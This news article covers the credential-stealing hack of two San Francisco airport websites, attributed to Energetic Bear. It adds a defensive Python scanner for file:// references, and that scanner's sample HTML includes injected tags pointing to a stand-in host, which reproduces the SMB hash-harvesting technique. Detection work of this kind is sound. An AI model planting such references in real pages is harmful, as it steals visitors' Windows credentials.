
Data Breach of Two San Francisco International Airport (SFO) Websites Linked to Russian Hackers
Last month two websites, SFOConnect.com and SFOConstruction.com, belonging to San Francisco International Airport (SFO) were hacked. The San Francisco airport data breach is now being pinned on hackers believed to be working for the Russian government, according to cyber security researchers at ESET.
A data breach notice posted on both websites states that the attackers “inserted malicious computer code on these websites to steal some users’ login credentials.” The malware has been removed from both sites. SFO Airport officials forced users to reset their passwords on all airport email accounts and network passwords. Anyone who has accessed either website should change their username and password.
ESET says a Russian Advanced Persistent Threat (APT) group known as Energetic Bear or Crouching Yeti is behind the hack of the two airport websites. One of the breached websites, SFOConnect.com, is a website used by airport employees. The second website attacked, SFOConstruction.com, is a web portal used by SFO airport construction contractors. Both websites were compromised when hackers deployed malware to steal login credentials from website visitors. According to the airport report, the goal of the attack was to steal website login credentials. But according to ESET, the goal of the attack was to steal Windows login credentials from website visitors.
“The intent was to collect Windows credentials (username/NTLM hash) of visitors by exploiting an SMB feature and the file:// prefix,” the ESET research team said.
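One way a site owner can check their own pages for the kind of injection ESET describes is to scan the served HTML for resource references that use the file: scheme, since those are what make a visitor's browser attempt an SMB connection. The following is an added example, not code from the article, ESET or SFO; the sample HTML and the 203.0.113.10 address are constructed for illustration.

```python
"""Scan a page's HTML for resource references that would make a visiting
browser reach out over SMB via a file:// URL, the credential-harvesting
technique ESET describes. Added example, not code from ESET or SFO."""
import re
from html.parser import HTMLParser

# Attributes that trigger a fetch when the page renders.
FETCH_ATTRS = {"src", "href", "data", "action", "poster", "background"}
# file: scheme, case-insensitive, tolerating leading whitespace.
FILE_SCHEME = re.compile(r"^\s*file:", re.IGNORECASE)
# url(file:...) inside an inline style attribute.
CSS_FILE_URL = re.compile(r"url\(\s*['\"]?\s*file:", re.IGNORECASE)


class FileUrlScanner(HTMLParser):
    """Collects (tag, attribute, value) for every file: reference."""

    def __init__(self):
        super().__init__()  # HTMLParser unescapes entity-encoded attribute values
        self.findings = []

    def handle_starttag(self, tag, attrs):
        for name, value in attrs:
            if not value:
                continue
            name = name.lower()
            if name in FETCH_ATTRS and FILE_SCHEME.match(value):
                self.findings.append((tag, name, value.strip()))
            elif name == "style" and CSS_FILE_URL.search(value):
                self.findings.append((tag, name, value.strip()))


def find_file_references(html):
    """Return every file: resource reference found in the HTML."""
    scanner = FileUrlScanner()
    scanner.feed(html)
    scanner.close()
    return scanner.findings


# Constructed sample page; 203.0.113.10 is a documentation-range address,
# not an indicator from the SFO incident.
SAMPLE_HTML = """<html><body>
<img src="https://cdn.example.test/logo.png">
<a href="/login">Sign in</a>
<img src=" FILE://203.0.113.10/share/pixel.png" width="1" height="1">
<div style="background:url(file://203.0.113.10/share/bg.png)"></div>
</body></html>"""

if __name__ == "__main__":
    for tag, attr, value in find_file_references(SAMPLE_HTML):
        print(f"<{tag} {attr}> -> {value}")
```

Run against the HTML actually served to visitors (not the source in the repository), since the injected code lives on the compromised server. Blocking outbound SMB (TCP 445) at the network edge stops a visiting workstation from completing the connection even if a page is compromised.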
The data breach is believed to be the work of a state-sponsored hacking group called Energetic Bear which works at the behest of the Russian government. There is no connection to Magecart malware used to steal credentials from ecommerce websites.
DHS and FBI Alert on Russian Hackers
In 2018, the US Department of Homeland Security (DHS) and the Federal Bureau of Investigation (FBI) issued a joint technical alert warning of cyberthreats from Energetic Bear. The cyberattacks have targeted U.S. Government entities as well as critical infrastructure organizations in the energy, nuclear, commercial facilities, water, aviation, and manufacturing sectors since at least 2016. The hackers focus primarily on organizations in the Middle East, Turkey, and the United States. The alert reports that the hackers use malware and spear phishing emails to obtain remote access into IT networks. After gaining access, the hackers conducted network reconnaissance, gathered credentials, moved laterally through networks, and collected data on Industrial Control Systems (ICS).